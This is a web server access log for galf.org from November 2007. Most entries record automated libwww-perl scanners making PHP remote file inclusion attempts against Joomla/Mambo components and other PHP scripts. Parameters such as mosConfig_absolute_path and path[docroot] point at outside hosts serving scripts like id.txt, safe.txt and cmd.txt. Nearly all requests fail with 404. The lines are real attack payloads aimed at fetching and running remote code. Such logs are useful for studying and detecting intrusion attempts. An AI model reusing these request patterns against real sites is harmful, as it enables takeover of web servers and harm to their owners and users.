63.148.182.6 - - [11/Nov/2007:17:17:33 -0800] "GET /newspublish/include.php?path[docroot]=http://bokreta.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
63.148.182.6 - - [11/Nov/2007:17:17:34 -0800] "GET /logs/newspublish/include.php?path[docroot]=http://bokreta.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.55.208.228 - - [11/Nov/2007:17:17:49 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.208.228 - - [11/Nov/2007:17:17:50 -0800] "GET /tmp/ HTTP/1.0" 200 504 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
69.93.189.130 - - [11/Nov/2007:17:18:05 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.prog-gaming.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.189.130 - - [11/Nov/2007:17:18:05 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.prog-gaming.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
221.219.217.152 - - [11/Nov/2007:17:18:12 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
221.219.217.152 - - [11/Nov/2007:17:18:13 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mursia.net/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.209.9.68 - - [11/Nov/2007:17:18:40 -0800] "GET /logs//oneadmin/calendar/include.php?path[docroot]=http://www.zooz.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
204.209.9.68 - - [11/Nov/2007:17:18:40 -0800] "GET //oneadmin/calendar/include.php?path[docroot]=http://www.zooz.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
69.93.189.130 - - [11/Nov/2007:17:19:32 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.prog-gaming.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.189.130 - - [11/Nov/2007:17:19:33 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.prog-gaming.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
160.75.69.1 - - [11/Nov/2007:17:19:45 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
160.75.69.1 - - [11/Nov/2007:17:19:46 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
160.75.69.1 - - [11/Nov/2007:17:20:43 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
160.75.69.1 - - [11/Nov/2007:17:20:43 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.28.220 - - [11/Nov/2007:17:21:19 -0800] "GET /cendoc/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
85.214.94.118 - - [11/Nov/2007:17:21:31 -0800] "GET /logs//oneadmin/calendar/include.php?path[docroot]=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.94.118 - - [11/Nov/2007:17:21:31 -0800] "GET //oneadmin/calendar/include.php?path[docroot]=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.117.202.152 - - [11/Nov/2007:17:21:48 -0800] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://tryon.pagebr.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.203.42 - - [11/Nov/2007:17:21:50 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
69.93.203.42 - - [11/Nov/2007:17:21:50 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
66.55.132.33 - - [11/Nov/2007:17:22:08 -0800] "GET //mcf.php?content=http://www.neoncomanda.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.214.94.118 - - [11/Nov/2007:17:22:18 -0800] "GET /logs//oneadmin/calendar/include.php?path[docroot]=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
85.214.94.118 - - [11/Nov/2007:17:22:19 -0800] "GET //oneadmin/calendar/include.php?path[docroot]=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
204.209.9.68 - - [11/Nov/2007:17:22:25 -0800] "GET /logs//oneadmin/calendar/include.php?path[docroot]=http://www.zooz.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "galf.org"
204.209.9.68 - - [11/Nov/2007:17:22:25 -0800] "GET //oneadmin/calendar/include.php?path[docroot]=http://www.zooz.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
160.75.69.1 - - [11/Nov/2007:17:22:36 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
160.75.69.1 - - [11/Nov/2007:17:22:36 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
72.3.139.165 - - [11/Nov/2007:17:22:43 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://podlinov.ru/guestbook/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
65.202.76.60 - - [11/Nov/2007:17:23:24 -0800] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.odady.com/images/tOtti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.55.132.33 - - [11/Nov/2007:17:23:29 -0800] "GET /logs/access_071029.log//mcf.php?content=http://www.neoncomanda.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.189.130 - - [11/Nov/2007:17:23:29 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.prog-gaming.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
66.55.132.33 - - [11/Nov/2007:17:23:29 -0800] "GET /logs//mcf.php?content=http://www.neoncomanda.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.189.130 - - [11/Nov/2007:17:23:29 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.prog-gaming.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
65.202.76.60 - - [11/Nov/2007:17:24:25 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.odady.com/images/tOtti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
63.148.182.6 - - [11/Nov/2007:17:24:28 -0800] "GET /logs/access_070924.log/newspublish/include.php?path[docroot]=http://bokreta.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
63.148.182.6 - - [11/Nov/2007:17:24:28 -0800] "GET /logs/access_070924.log/newspublish/include.php?path[docroot]=http://bokreta.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
68.180.250.77 - - [11/Nov/2007:17:25:44 -0800] "GET /logs/access_070917.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
200.137.130.13 - - [11/Nov/2007:17:26:06 -0800] "GET /logs/?mosConfig_absolute_path=http://www.salcedo.com.do/visitas//id.txt? HTTP/1.1" 200 5371 "-" "libwww-perl/5.805" "www.galf.org"
200.137.130.13 - - [11/Nov/2007:17:26:09 -0800] "GET /?mosConfig_absolute_path=http://www.salcedo.com.do/visitas//id.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
69.93.189.130 - - [11/Nov/2007:17:26:15 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.prog-gaming.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.189.130 - - [11/Nov/2007:17:26:15 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.prog-gaming.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.67.202.81 - - [11/Nov/2007:17:27:43 -0800] "GET /logs/newspublish/include.php?path[docroot]=http://www.zooz.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.galf.org"
212.67.202.81 - - [11/Nov/2007:17:27:43 -0800] "GET /newspublish/include.php?path[docroot]=http://www.zooz.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.galf.org"
87.117.202.152 - - [11/Nov/2007:17:28:01 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://tryon.pagebr.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.202.152 - - [11/Nov/2007:17:28:01 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://tryon.pagebr.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
160.75.69.1 - - [11/Nov/2007:17:28:18 -0800] "GET /logs/access_071014.log//dotproject/includes/db_adodb.php?baseDir=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
160.75.69.1 - - [11/Nov/2007:17:28:18 -0800] "GET /logs//dotproject/includes/db_adodb.php?baseDir=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
157.193.62.155 - - [11/Nov/2007:17:28:40 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://65.102.222.93/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
157.193.62.155 - - [11/Nov/2007:17:28:40 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://65.102.222.93/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
160.75.69.1 - - [11/Nov/2007:17:28:49 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
160.75.69.1 - - [11/Nov/2007:17:28:49 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
157.193.62.155 - - [11/Nov/2007:17:28:52 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://65.102.222.93/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "galf.org"
157.193.62.155 - - [11/Nov/2007:17:28:52 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://65.102.222.93/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "galf.org"
72.5.54.36 - - [11/Nov/2007:17:29:03 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.odady.com/images/tOtti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.5.54.36 - - [11/Nov/2007:17:29:03 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.odady.com/images/tOtti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.117.202.152 - - [11/Nov/2007:17:29:56 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tryon.pagebr.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.89.224.76 - - [11/Nov/2007:17:31:46 -0800] "GET /logs/access_071105.log HTTP/1.0" 200 6430467 "-" "Wget/1.10.2" "galf.org"
87.117.202.152 - - [11/Nov/2007:17:31:56 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://tryon.pagebr.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.202.152 - - [11/Nov/2007:17:31:56 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://tryon.pagebr.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.25.148.183 - - [11/Nov/2007:17:34:08 -0800] "GET /logs/access_071001.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hgbruce.com/components/com_rsgallery/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.148.183 - - [11/Nov/2007:17:34:09 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hgbruce.com/components/com_rsgallery/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.148.183 - - [11/Nov/2007:17:34:09 -0800] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hgbruce.com/components/com_rsgallery/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.26.145.91 - - [11/Nov/2007:17:34:48 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.towaterfront.ca/surveys/.system/rid/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.26.145.91 - - [11/Nov/2007:17:34:49 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.towaterfront.ca/surveys/.system/rid/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.26.145.91 - - [11/Nov/2007:17:37:10 -0800] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.towaterfront.ca/surveys/strings.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.26.145.91 - - [11/Nov/2007:17:37:10 -0800] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
64.26.145.91 - - [11/Nov/2007:17:37:11 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.towaterfront.ca/surveys/strings.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.26.145.91 - - [11/Nov/2007:17:37:11 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.30.216.95 - - [11/Nov/2007:17:37:59 -0800] "GET /logs/access_071015.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
85.25.148.183 - - [11/Nov/2007:17:38:22 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hgbruce.com/components/com_rsgallery/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.26.145.91 - - [11/Nov/2007:17:39:47 -0800] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.towaterfront.ca/surveys/strings.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.26.145.91 - - [11/Nov/2007:17:39:47 -0800] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.26.145.91 - - [11/Nov/2007:17:39:48 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.towaterfront.ca/surveys/strings.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.26.145.91 - - [11/Nov/2007:17:39:48 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.101.4.42 - - [11/Nov/2007:17:40:03 -0800] "GET /logs/template.php?pagina=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.101.4.42 - - [11/Nov/2007:17:40:03 -0800] "GET /logs/template.php?pagina=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.101.4.42 - - [11/Nov/2007:17:40:04 -0800] "GET /template.php?pagina=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.101.4.42 - - [11/Nov/2007:17:40:04 -0800] "GET /template.php?pagina=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.250.239.170 - - [11/Nov/2007:17:40:21 -0800] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://garyz.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.250.239.170 - - [11/Nov/2007:17:40:22 -0800] "GET /modules/agendax/addevent.inc.php?agendax_path=http://garyz.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.30.214.230 - - [11/Nov/2007:17:40:28 -0800] "GET /logs/access_070910.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
87.117.202.152 - - [11/Nov/2007:17:40:37 -0800] "GET /logs/access_071022.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tryon.pagebr.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.202.152 - - [11/Nov/2007:17:40:37 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tryon.pagebr.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.67.202.81 - - [11/Nov/2007:17:40:47 -0800] "GET /logs/access_071015.log/newspublish/include.php?path[docroot]=http://www.zooz.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.galf.org"
87.101.4.42 - - [11/Nov/2007:17:40:51 -0800] "GET /logs/template.php?pagina=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
87.101.4.42 - - [11/Nov/2007:17:40:51 -0800] "GET /logs/template.php?pagina=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
87.101.4.42 - - [11/Nov/2007:17:40:51 -0800] "GET /template.php?pagina=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
87.101.4.42 - - [11/Nov/2007:17:40:51 -0800] "GET /template.php?pagina=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
85.25.148.183 - - [11/Nov/2007:17:42:16 -0800] "GET /logs/access_071029.log/skin/zero_vote/error.php?dir=http://www.hgbruce.com/components/com_rsgallery/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.67.202.81 - - [11/Nov/2007:17:42:31 -0800] "GET /logs/access_070924.log/newspublish/include.php?path[docroot]=http://www.zooz.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.galf.org"
85.25.148.183 - - [11/Nov/2007:17:42:44 -0800] "GET /skin/zero_vote/error.php?dir=http://www.hgbruce.com/components/com_rsgallery/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.66.70 - - [11/Nov/2007:17:42:57 -0800] "GET //board/skin/zero_vote/setup.php?dir=http://my3dwork.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
85.25.148.183 - - [11/Nov/2007:17:43:19 -0800] "GET /logs/skin/zero_vote/error.php?dir=http://www.hgbruce.com/components/com_rsgallery/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.148.183 - - [11/Nov/2007:17:45:44 -0800] "GET /logs/access_071008.log/skin/zero_vote/error.php?dir=http://www.hgbruce.com/components/com_rsgallery/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.26.145.91 - - [11/Nov/2007:17:46:33 -0800] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.towaterfront.ca/surveys/.system/rid/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.26.145.91 - - [11/Nov/2007:17:46:33 -0800] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.towaterfront.ca/surveys/.system/rid/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.214.94.118 - - [11/Nov/2007:17:46:38 -0800] "GET /logs//oneadmin/calendar/include.php?path[docroot]=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.94.118 - - [11/Nov/2007:17:46:39 -0800] "GET //oneadmin/calendar/include.php?path[docroot]=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.94.118 - - [11/Nov/2007:17:46:39 -0800] "GET /logs//oneadmin/calendar/include.php?path[docroot]=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
85.214.94.118 - - [11/Nov/2007:17:46:40 -0800] "GET //oneadmin/calendar/include.php?path[docroot]=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
85.25.148.183 - - [11/Nov/2007:17:47:00 -0800] "GET /logs/access_071008.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.hgbruce.com/components/com_rsgallery/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.148.183 - - [11/Nov/2007:17:47:00 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.hgbruce.com/components/com_rsgallery/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.148.183 - - [11/Nov/2007:17:47:01 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.hgbruce.com/components/com_rsgallery/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.254.236.11 - - [11/Nov/2007:17:47:10 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gamezspace.net/test/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
193.254.236.11 - - [11/Nov/2007:17:47:11 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gamezspace.net/test/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
85.25.148.183 - - [11/Nov/2007:17:47:29 -0800] "GET /logs/access_071022.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.hgbruce.com/components/com_rsgallery/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.148.183 - - [11/Nov/2007:17:50:41 -0800] "GET /logs/access_071014.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hgbruce.com/components/com_rsgallery/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.148.183 - - [11/Nov/2007:17:50:58 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.hgbruce.com/components/com_rsgallery/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.98.12.2 - - [11/Nov/2007:17:51:22 -0800] "GET /logs/access_071022.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.98.12.2 - - [11/Nov/2007:17:51:23 -0800] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.98.12.2 - - [11/Nov/2007:17:51:23 -0800] "GET /logs//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.98.12.2 - - [11/Nov/2007:17:52:50 -0800] "GET /logs/access_071029.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.214.94.118 - - [11/Nov/2007:17:53:39 -0800] "GET /logs//oneadmin/calendar/include.php?path[docroot]=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.94.118 - - [11/Nov/2007:17:53:40 -0800] "GET //oneadmin/calendar/include.php?path[docroot]=http://www.burning-souls.net/cache/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.213.88.13 - - [11/Nov/2007:17:53:40 -0800] "GET /logs/access.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.arpemg.org.br/cache/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.213.88.13 - - [11/Nov/2007:17:53:41 -0800] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.arpemg.org.br/cache/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.213.88.13 - - [11/Nov/2007:17:53:42 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.arpemg.org.br/cache/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.213.88.13 - - [11/Nov/2007:17:53:59 -0800] "GET /logs/access_070716.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.arpemg.org.br/cache/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.213.88.13 - - [11/Nov/2007:17:54:00 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.arpemg.org.br/cache/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.213.88.13 - - [11/Nov/2007:17:54:00 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.arpemg.org.br/cache/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
24.165.176.80 - - [11/Nov/2007:17:54:42 -0800] "GET / HTTP/1.1" 200 1048 "http://www.google.com/search?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&q=galf" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9" "www.galf.org"
24.165.176.80 - - [11/Nov/2007:17:54:42 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9" "www.galf.org"
209.250.239.170 - - [11/Nov/2007:17:54:45 -0800] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://garyz.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
